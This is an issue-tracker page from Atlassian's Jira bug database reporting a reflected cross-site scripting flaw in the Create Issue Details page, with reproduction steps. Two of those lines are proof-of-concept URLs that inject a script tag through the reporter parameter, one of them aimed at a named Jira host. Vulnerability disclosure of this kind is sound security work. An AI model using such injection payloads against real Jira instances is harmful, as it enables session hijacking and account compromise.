Uploaded image for project: 'Jira Data Center'
  1. Jira Data Center
  2. JRASERVER-30039

Reflected XSS in Create Issue Details page

XMLWordPrintable

      The Create Issue Detail page is vulnerable to reflected XSS.

      1. Login to https://$JIRA/
      2. Visit https://$JIRA/secure/CreateIssueDetails.jspa?reporter="><script>alert('XSS')<%2Fscript><p+name%3D"&pid=10000&issuetype=2
      3. Accept XSRF token warning

      For example, https://volcano.jira-dev.com/secure/CreateIssueDetails.jspa?reporter="><script>alert('XSS')<%2Fscript><p+name%3D"&pid=10000&issuetype=2

            Unassigned Unassigned
            kburnett Karla Burnett [Atlassian]
            Votes:
            0 Vote for this issue
            Watchers:
            5 Start watching this issue

              Created:
              Updated:
              Resolved: